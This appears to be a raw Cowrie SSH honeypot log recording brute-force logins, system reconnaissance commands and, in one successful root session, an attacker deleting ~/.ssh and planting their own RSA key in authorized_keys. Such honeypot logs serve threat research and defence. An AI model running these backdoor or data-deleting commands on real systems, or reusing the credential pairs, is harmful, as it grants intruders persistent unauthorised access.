{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:24.494623Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-09-09T06:52:24.495342Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":30,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:24.693137Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:25.100817Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-09-09T06:52:25.101554Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-09-09T06:52:25.101995Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:25.302655Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:25.810531Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-09-09T06:52:25.811363Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:26.009943Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:26.465866Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-09-09T06:52:26.466715Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":197,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:26.665077Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:27.074463Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-09T06:52:27.075316Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:27.273517Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:28.202060Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-09T06:52:28.203010Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:28.403644Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:28.820157Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-09-09T06:52:28.820869Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:29.021482Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:29.521781Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-09-09T06:52:29.522565Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:29.721233Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:30.181608Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-09T06:52:30.182286Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:30.384099Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:30.792810Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-09-09T06:52:30.793487Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:30.992239Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:31.491683Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-09-09T06:52:31.492366Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:31.691497Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:32.100137Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-09-09T06:52:32.100812Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:32.299002Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.session.closed","duration":"21.6","message":"Connection lost after 21.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:32.300518Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33674,"dst_ip":"1.2.3.4","dst_port":22,"session":"db42f520186e","protocol":"ssh","message":"New connection: 212.227.235.229:33674 (1.2.3.4:22) [session: db42f520186e]","sensor":"my-vps","timestamp":"2025-09-09T06:52:40.186920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:52:40.187698Z","src_ip":"212.227.235.229","session":"db42f520186e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:52:40.274928Z","src_ip":"212.227.235.229","session":"db42f520186e"}
{"eventid":"cowrie.login.success","username":"root","password":"2wsx!QAZ3edc","message":"login attempt [root/2wsx!QAZ3edc] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:52:40.668843Z","src_ip":"212.227.235.229","session":"db42f520186e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:40.914958Z","src_ip":"212.227.235.229","session":"db42f520186e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:52:40.915635Z","src_ip":"212.227.235.229","session":"db42f520186e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:52:40.916713Z","src_ip":"212.227.235.229","session":"db42f520186e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:41.005671Z","src_ip":"212.227.235.229","session":"db42f520186e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:41.257373Z","src_ip":"212.227.235.229","session":"db42f520186e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:52:41.258266Z","src_ip":"212.227.235.229","session":"db42f520186e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:52:41.349187Z","src_ip":"212.227.235.229","session":"db42f520186e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:41.350059Z","src_ip":"212.227.235.229","session":"db42f520186e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33817,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d64b6e1f187","protocol":"ssh","message":"New connection: 212.227.235.229:33817 (1.2.3.4:22) [session: 4d64b6e1f187]","sensor":"my-vps","timestamp":"2025-09-09T06:52:41.435668Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:52:41.436393Z","src_ip":"212.227.235.229","session":"4d64b6e1f187"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:52:41.524003Z","src_ip":"212.227.235.229","session":"4d64b6e1f187"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:52:41.915429Z","src_ip":"212.227.235.229","session":"4d64b6e1f187"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:43.005269Z","src_ip":"212.227.235.229","session":"4d64b6e1f187"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33986,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee6bada981fa","protocol":"ssh","message":"New connection: 212.227.235.229:33986 (1.2.3.4:22) [session: ee6bada981fa]","sensor":"my-vps","timestamp":"2025-09-09T06:52:43.049868Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:52:43.050742Z","src_ip":"212.227.235.229","session":"ee6bada981fa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:52:43.116457Z","src_ip":"212.227.235.229","session":"ee6bada981fa"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:52:43.423946Z","src_ip":"212.227.235.229","session":"ee6bada981fa"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:43.491483Z","src_ip":"212.227.235.229","session":"ee6bada981fa"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:43.512956Z","src_ip":"212.227.235.229","session":"db42f520186e"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":45946,"dst_ip":"1.2.3.4","dst_port":22,"session":"e94bbd947429","protocol":"ssh","message":"New connection: 92.118.39.62:45946 (1.2.3.4:22) [session: e94bbd947429]","sensor":"my-vps","timestamp":"2025-09-09T06:52:44.432934Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:52:44.433908Z","src_ip":"92.118.39.62","session":"e94bbd947429"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T06:52:44.463822Z","src_ip":"92.118.39.62","session":"e94bbd947429"}
{"eventid":"cowrie.login.failed","username":"clay","password":"clay1","message":"login attempt [clay/clay1] failed","sensor":"my-vps","timestamp":"2025-09-09T06:52:44.555560Z","src_ip":"92.118.39.62","session":"e94bbd947429"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:45.588262Z","src_ip":"92.118.39.62","session":"e94bbd947429"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63795,"dst_ip":"1.2.3.4","dst_port":22,"session":"20aa3a017bcb","protocol":"ssh","message":"New connection: 212.227.235.229:63795 (1.2.3.4:22) [session: 20aa3a017bcb]","sensor":"my-vps","timestamp":"2025-09-09T06:52:57.889526Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:52:57.890498Z","src_ip":"212.227.235.229","session":"20aa3a017bcb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","a